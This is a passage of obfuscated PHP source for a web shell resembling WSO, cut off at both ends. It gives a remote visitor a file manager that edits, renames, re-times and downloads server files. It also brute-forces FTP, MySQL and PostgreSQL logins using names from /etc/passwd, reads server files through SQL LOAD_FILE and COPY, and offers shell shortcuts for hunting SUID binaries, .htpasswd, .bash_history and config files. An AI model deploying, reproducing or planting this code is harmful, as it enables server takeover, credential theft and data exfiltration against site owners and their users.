", $temp; goto C0aa1; Fd5b0: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Ed1e9; C0aa1: exit; goto a74ac; Ed1e9: ob_start(); goto Adc01; Adc01: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto Ee0ad; Ee0ad: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
"; goto Eedd2; a74ac: } goto B2c2d; B7f20: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto b07ab; c539d: nWfzhFooter(); goto F2648; f039e: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto df26e; Bf766: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto b8ab7; aaeda: Fb1ba: goto F338a; b8ab7: $r = ''; goto b18be; b418c: f34c7: goto f37ac; b18be: $i = 0; goto a0926; a5d55: if (!($i < strlen($p))) { goto Fb1ba; } goto F5004; a0926: E1b8d: goto a5d55; F5004: $r .= sprintf('%02X', ord($p[$i])); goto b418c; F338a: return strtoupper($r); goto B1a5b; f37ac: ++$i; goto e7ea2; e7ea2: goto E1b8d; goto aaeda; B1a5b: } } goto A7e35; E55df: Afcdc: goto E4862; A7e35: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto ec2a8; A6610: d7376: goto C7ad1; f2755: goto c84d0; goto Fdac2; Aec4d: c84d0: goto Ebca6; C7ad1: ++$i; goto f2755; e1418: $i = 0; goto Aec4d; A8a85: return strtoupper($r); goto ce654; Ebca6: if (!($i < strlen($p))) { goto Fe1b4; } goto B8935; Fdac2: Fe1b4: goto A8a85; ec2a8: $r = ''; goto e1418; B8935: $r .= '%' . dechex(ord($p[$i])); goto A6610; ce654: } } goto F98ad; B4727: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto E26f9; A5f75: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto f039e; E62b7: echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
</form></div>"; goto c539d; F98ad: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto d44af; C5289: function nWfzhRecursiveGlob($path) { goto f0675; E3fd8: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { nWfzhRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } dbde6: } D27d6: } goto e2314; f85d0: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto E3fd8; f0675: if (substr($path, -1) != '/') { $path .= '/'; } goto f85d0; e2314: } goto d0a16; E4862: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto B4727; df26e: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto d1d59; d1d59: $r = ''; goto acceb; Cd325: C4498: goto e816d; acceb: $i = 0; goto Cd325; F9f97: cf43c: goto bf3e5; bf3e5: $i += 2; goto cb8b6; cb8b6: goto C4498; goto D4938; D4938: e8b45: goto fa716; fa716: return $r; goto e40ee; A00d9: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto F9f97; e816d: if (!($i < strLen($p))) { goto e8b45; } goto A00d9; e40ee: } } goto Bf766; D06bd: nWfzhHeader(); goto f52df; B2c2d: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto D06bd; f52df: echo '<h1>String conversions</h1><div class=content>'; goto B7f20; d0a16: if (@$_POST['p3']) { nWfzhRecursiveGlob($_POST['c']); } goto E62b7; F2648: } goto f36c9; C3f56: $safe_mode = @ini_get('safe_mode'); goto Eb763; F7c7f: @ini_set('error_log', NULL); goto b8976; B37cf: $default_action = 'FilesMan'; goto dd1cc; a7327: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto C3f56; cfad7: $disable_functions = @ini_get('disable_functions'); goto A74ac; a18f7: @set_time_limit(0); goto a892c; f36c9: function actionFilesTools() { goto Afea6; c67ea: switch ($_POST['p2']) { case 'view': goto B2ecd; fe79d: if ($fp) { goto E96f8; E96f8: D638d: goto A4007; A4007: if (@feof($fp)) { goto Aff24; } goto a438a; a438a: echo htmlspecialchars(@fread($fp, 1024)); goto bf4d2; b6c5e: @fclose($fp); goto bb91a; bf4d2: goto D638d; goto F8c5e; F8c5e: Aff24: goto b6c5e; bb91a: } goto a7328; Cd044: $fp = @fopen($_POST['p1'], 'r'); goto fe79d; a7328: echo '</pre>'; goto a1721; a1721: goto db269; goto e1ccb; B2ecd: echo '<pre class=ml1>'; goto Cd044; e1ccb: case 'highlight': if (@is_readable($_POST['p1'])) { goto E5ce5; E5ce5: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto f442d; f442d: $code = @highlight_file($_POST['p1'], true); goto A9edf; A9edf: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto A7a53; A7a53: } goto db269; case 'chmod': goto Fee5c; B4dbd: clearstatcache(); goto cde21; Fee5c: if (!empty($_POST['p3'])) { goto D7104; D7104: $perms = 0; goto ead23; A5d6a: --$i; goto baed2; b9bfa: Ed663: goto A417b; Ca188: Cff7a: goto A5d6a; ead23: $i = strlen($_POST['p3']) - 1; goto E9bcc; A417b: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto B5c4f; C53d2: if (!($i >= 0)) { goto Ed663; } goto d2d1c; E9bcc: cea94: goto C53d2; d2d1c: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto Ca188; baed2: goto cea94; goto b9bfa; B5c4f: } goto B4dbd; cde21: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto Dc739; Dc739: goto db269; goto B5d27; B5d27: case 'edit': goto dfbb7; E04e2: if (!empty($_POST['p3'])) { goto e0d30; f6682: if ($fp) { goto D23e3; Dc5e2: @touch($_POST['p1'], $time, $time); goto E4903; D23e3: @fwrite($fp, $_POST['p3']); goto a03ec; a03ec: @fclose($fp); goto Dd38d; Dd38d: echo 'Saved!<br><script>p3_="";</script>'; goto Dc5e2; E4903: } goto de0d9; a370b: $fp = @fopen($_POST['p1'], "w"); goto f6682; e0d30: $time = @filemtime($_POST['p1']); goto c03be; c03be: $_POST['p3'] = substr($_POST['p3'], 1); goto a370b; de0d9: } goto c0eee; Df7e9: goto db269; goto D37f1; a380d: $fp = @fopen($_POST['p1'], 'r'); goto F9cca; F9cca: if ($fp) { goto Fa745; E72ab: echo htmlspecialchars(@fread($fp, 1024)); goto D2007; Fa745: E320a: goto E1a95; fd78e: @fclose($fp); goto f2520; E1a95: if (@feof($fp)) { goto c3b97; } goto E72ab; fecba: c3b97: goto fd78e; D2007: goto E320a; goto fecba; f2520: } goto D9358; dfbb7: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto db269; } goto E04e2; D9358: echo '</textarea><input type=submit value=">>"></form>'; goto Df7e9; c0eee: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto a380d; D37f1: case 'hexdump': goto ec1aa; c465b: if (!($i < $len)) { goto A900b; } goto b8659; D3b78: $n++; goto b7182; b3b3e: $len = strlen($c); goto f0f48; f0f48: $i = 0; goto Ad87c; b8659: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto C05b7; C2ea3: goto db269; goto bdd49; F66f4: $h = array('00000000<br>', '', ''); goto b3b3e; ec1aa: $c = @file_get_contents($_POST['p1']); goto cd73a; cd73a: $n = 0; goto F66f4; Ee2d3: goto a88fe; goto beb89; Ad87c: a88fe: goto c465b; f263a: A348e: goto D3b78; beb89: A900b: goto ba9d2; Fab3d: A3d96: goto Ec8cf; bde3b: C0d16: goto f263a; C05b7: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto A348e; case 9: $h[2] .= ' '; goto A348e; case 10: $h[2] .= ' '; goto A348e; case 13: $h[2] .= ' '; goto A348e; default: $h[2] .= $c[$i]; goto A348e; } goto bde3b; b7182: if ($n == 32) { goto c9c4b; c9c4b: $n = 0; goto e0f2a; e0f2a: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto B12a0; Bf54c: $h[2] .= "
"; goto E0bd3; B12a0: $h[1] .= '<br>'; goto Bf54c; E0bd3: } goto Fab3d; ba9d2: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto C2ea3; Ec8cf: ++$i; goto Ee2d3; bdd49: case 'rename': goto f161c; c399d: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto a3294; f161c: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto c399d; a3294: goto db269; goto f7285; f7285: case 'touch': goto b71c2; b71c2: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto E96a7; E96a7: clearstatcache(); goto F710a; F710a: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto e75b5; e75b5: goto db269; goto F16bb; F16bb: } goto bc809; E3d5a: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto Be274; b80a4: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto F4d33; Be274: ob_start("ob_gzhandler", 4096); goto abffe; F4d33: $fp = @fopen($_POST['p1'], "r"); goto c5091; abffe: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto b80a4; c5091: if ($fp) { goto bc033; E5cb2: goto F7d02; goto fe8a9; Cabd2: echo @fread($fp, 1024); goto E5cb2; bc85d: fclose($fp); goto c4889; bc033: F7d02: goto Fa468; fe8a9: bd790: goto bc85d; Fa468: if (@feof($fp)) { goto bd790; } goto Cabd2; c4889: } goto b1cf1; b1cf1: } exit; } goto Adb07; d4bc4: db269: goto Be228; C2a32: nWfzhHeader(); goto Cf38e; C063d: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto B0245; Afea6: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto E3d5a; B8ef5: echo '<br><br>'; goto c67ea; C79c4: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto D7f65; E8011: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto C063d; Bdfea: if (!file_exists(@$_POST['p1'])) { goto Bf43c; Bf43c: echo 'File not exists'; goto abc5e; F3637: return; goto Cf629; abc5e: nWfzhFooter(); goto F3637; Cf629: } goto C79c4; d2281: E5958: goto B8ef5; Adb07: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto C2a32; D7f65: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto e79f4; Be228: echo '</div>'; goto b1a4c; e79f4: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? nWfzhViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . nWfzhPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto Bfbb0; bc809: b834c: goto d4bc4; b1a4c: nWfzhFooter(); goto Ea8f7; B0245: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; F8108: } goto d2281; Cf38e: echo '<h1>File tools</h1><div class=content>'; goto Bdfea; Bfbb0: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto E8011; Ea8f7: } goto c8a09; C8433: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto ca726; b9836: function nWfzhWhich($p) { goto Ad4c1; Ecf3e: if (!empty($path)) { return $path; } goto Cc879; Cc879: return false; goto D2791; Ad4c1: $path = nWfzhEx('which ' . $p); goto Ecf3e; D2791: } goto b7dff; d61c6: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto Dc03e; fbb7a: function actionBruteforce() { goto B7db6; Ae830: nWfzhFooter(); goto b1833; B7db6: nWfzhHeader(); goto d1cd2; e275c: echo '</div><br>'; goto Ae830; d1cd2: if (isset($_POST['proto'])) { goto B0268; Ef13f: if ($_POST['proto'] == 'ftp') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto De2a4; De2a4: $fp = @ftp_connect($ip, $port ? $port : 21); goto ad191; Bac2a: @ftp_close($fp); goto D495a; D60b8: $res = @ftp_login($fp, $login, $pass); goto Bac2a; D495a: return $res; goto Cae24; ad191: if (!$fp) { return false; } goto D60b8; Cae24: } } elseif ($_POST['proto'] == 'mysql') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto A9274; Ddf95: @mysql_close($res); goto Aa79a; A9274: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto Ddf95; Aa79a: return $res; goto c144e; c144e: } } elseif ($_POST['proto'] == 'pgsql') { function nWfzhBruteForce($ip, $port, $login, $pass) { goto Adec6; fc4d9: $res = @pg_connect($str); goto C1ee4; Adec6: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto fc4d9; C1ee4: @pg_close($res); goto E342a; E342a: return $res; goto A18c0; A18c0: } } goto d83c9; Ea0af: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto Ef624; Baf09: if (@$_POST['reverse']) { goto Cfc49; F0745: b1e55: goto a7a12; Bf743: goto b2329; goto Afef9; a7a12: --$i; goto Bf743; Eae04: $i = strlen($line[0]) - 1; goto C0ae8; C0ae8: b2329: goto fd12b; Afef9: d5fdb: goto F1cad; fd12b: if (!($i >= 0)) { goto d5fdb; } goto F8a92; Cfc49: $tmp = ""; goto Eae04; F8a92: $tmp .= $line[0][$i]; goto F0745; F1cad: ++$attempts; goto e0215; e0215: if (nWfzhBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto Db079; Db079: } goto ba290; Ef624: $line = explode(":", $line); goto ad96d; ad96d: ++$attempts; goto db7ca; db7ca: if (nWfzhBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto Baf09; ba290: d3b1d: goto D7a35; D7a35: } B21d1: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto e970d; E562b: F2138: goto B80ec; a6e9c: ++$attempts; goto Fa664; Fa664: if (nWfzhBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto E562b; e970d: $line = trim($line); goto a6e9c; B80ec: } A6654: } } goto f72e6; B0268: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto Ef13f; C28d0: $attempts = 0; goto Cfdf2; Cfdf2: $server = explode(":", $_POST['server']); goto Ea0af; d83c9: $success = 0; goto C28d0; f72e6: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto d2406; d2406: } goto e1a08; e1a08: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto e275c; b1833: } goto Fef9b; fda81: function nWfzhScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto cbabc; bfe4c: be6fb: goto cfa61; D464f: return $files; goto a377b; bf0cd: a584f: goto D464f; Ac4aa: goto be6fb; goto bf0cd; cbabc: $dh = opendir($dir); goto bfe4c; cfa61: if (!(false !== ($filename = readdir($dh)))) { goto a584f; } goto c6439; c6439: $files[] = $filename; goto Ac4aa; a377b: } } goto b9836; cc88d: function nWfzhsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto d6719; Fef9b: function actionSql() { goto F5256; F5256: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto C5583; C5583: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto Df47b; case 'pgsql': goto d0d59; Dd65e: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto dc85b; a8dc8: if (!$host[1]) { $host[1] = 5432; } goto Dd65e; d0d59: $host = explode(':', $host); goto a8dc8; dc85b: goto Df47b; goto f00dd; f00dd: } goto C31ff; bb3b1: Df47b: goto e29ff; e29ff: return false; goto E9586; C31ff: F8e06: goto bb3b1; E9586: } function selectdb($db) { goto E4599; F3e72: return false; goto B72f7; E4599: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto Ed8f3; } goto c6a5a; C7b24: Ed8f3: goto F3e72; c6a5a: A0162: goto C7b24; B72f7: } function query($str) { goto Adaca; Adaca: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto Ba2da; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto Ba2da; } goto d80ef; Ee235: Ba2da: goto c22ab; c22ab: return false; goto ba47e; d80ef: Aa99c: goto Ee235; ba47e: } function fetch() { goto Ac2c1; Ac2c1: $res = func_num_args() ? func_get_arg(0) : $this->res; goto C6ac5; D6b1b: return false; goto ae584; b72b1: a446b: goto D6b1b; D2173: c719a: goto b72b1; C6ac5: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto a446b; case 'pgsql': return @pg_fetch_assoc($res); goto a446b; } goto D2173; ae584: } function listDbs() { goto D3531; a6757: C7bf3: goto d5fd6; d5fd6: return false; goto eda49; D3531: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto C7bf3; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto C7bf3; } goto Aeb10; Aeb10: C3f83: goto a6757; eda49: } function listTables() { goto b99c7; a4c5a: E0b37: goto A2a6d; A2a6d: return false; goto e61e8; b99c7: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto E0b37; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto E0b37; } goto c576f; c576f: f0827: goto a4c5a; e61e8: } function error() { goto c0825; B1faf: return false; goto de11c; c9056: cc9fb: goto A2a81; A2a81: A5c56: goto B1faf; c0825: switch ($this->type) { case 'mysql': return @mysql_error(); goto A5c56; case 'pgsql': return @pg_last_error(); goto A5c56; } goto c9056; de11c: } function setCharset($str) { goto c5fe8; c5ea5: F5b8d: goto be3fe; be3fe: Bf591: goto F7220; F7220: return false; goto b9288; c5fe8: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto Bf591; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto Bf591; } goto c5ea5; b9288: } function loadFile($str) { goto Ccb24; A7338: Fcfc5: goto C60cf; A1480: return false; goto A8969; Ccb24: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto Fed91; case 'pgsql': goto C60da; C60da: $this->query("CREATE TABLE nWfzh2(file text);COPY nWfzh2 FROM '" . addslashes($str) . "';select file from nWfzh2;"); goto b8b05; fe45b: $r[] = $i['file']; goto a4ac2; ba29c: if (!($i = $this->fetch())) { goto e9d62; } goto fe45b; D8716: return array('file' => implode("
", $r)); goto E9c3b; E9c3b: goto Fed91; goto fb1b0; C2a88: a23bb: goto ba29c; b8b05: $r = array(); goto C2a88; a4ac2: goto a23bb; goto Ae2f7; A8f44: $this->query('drop table nWfzh2'); goto D8716; Ae2f7: e9d62: goto A8f44; fb1b0: } goto A7338; C60cf: Fed91: goto A1480; A8969: } function dump($table, $fp = false) { goto C178d; fdc7a: B05de: goto Bff76; fdd65: return false; goto F5ab1; Bff76: Eeca3: goto fdd65; C178d: switch ($this->type) { case 'mysql': goto a1cd8; Ac45d: F5314: goto a6dfb; b0c9b: cd3dc: goto D99d0; F8de5: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto c0276; a1cd8: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto De55e; a6dfb: if (!($item = $this->fetch())) { goto cd3dc; } goto d3cb9; Cbf88: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "
,(" . implode(", ", $item) . ')'; } goto F8de5; e691e: $head = true; goto Ac45d; e4217: $this->query('SELECT * FROM `' . $table . '`'); goto deffa; a546c: foreach ($item as $k => $v) { goto cf4fa; cf4fa: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto Baf15; Baf15: $columns[] = "`" . $k . "`"; goto B9749; B9749: F257c: goto c0410; c0410: } goto E0c30; Cf592: $sql = $create[1] . ";
"; goto Bd073; De55e: $create = mysql_fetch_array($res); goto Cf592; D99d0: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";
"; } } goto df951; c0276: $i++; goto A637e; df951: goto Eeca3; goto e1a94; F4612: $columns = array(); goto a546c; deffa: $i = 0; goto e691e; Bd073: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e4217; d3cb9: $sql = ''; goto A5f99; A637e: goto F5314; goto b0c9b; E0c30: e5230: goto Cbf88; A5f99: if ($i % 1000 == 0) { $head = true; $sql = ";
"; } goto F4612; e1a94: case 'pgsql': goto d4a2b; e6393: if (!($item = $this->fetch())) { goto D3aa9; } goto a7a34; F41bd: goto Ed599; goto a906a; b49ea: goto Eeca3; goto E9c5e; e0a2f: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
